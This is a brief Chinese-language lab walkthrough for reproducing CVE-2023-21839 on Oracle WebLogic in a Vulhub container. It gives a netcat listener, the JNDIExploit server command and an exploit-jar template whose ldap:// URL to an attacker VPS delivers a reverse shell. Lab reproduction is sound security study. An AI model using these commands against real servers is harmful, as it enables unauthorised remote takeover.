CVE-2023-21839允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致RCE漏洞。
》》》影响版本《《《
- Weblogic 12.2.1.3.0
- Weblogic 12.2.1.4.0
- Weblogic 14.1.1.0.0
一:漏洞复现
步骤一:进入Vulhub对应的目录系下,启动容器并访问靶场...
#启动靶场
cd vulhub/weblogic/CVE-2023-21839
docker-compose build
docker-compose up -d
#访问靶场
http://ip:7001/
步骤二:在VSP上监听8080端口接收反弹过来的Shell并在VPS上运行JNDIExpLoit进行终端...
#端口监听
nc -l 8080
#JNDIExploit项目地址
https://github.com/WhiteHSBG/JNDIExploit
#JNDIExploit执行操作
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip
步骤三:在本地执行以下命令进行攻击
#攻击项目
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
#命令模板
java -jar Weblogic-CVE-2023-21839.jar 目标IP地址:目标端口 ldap://黑客VPS地址:1389/Basic/ReverseShell/黑客VPS地址/监听端口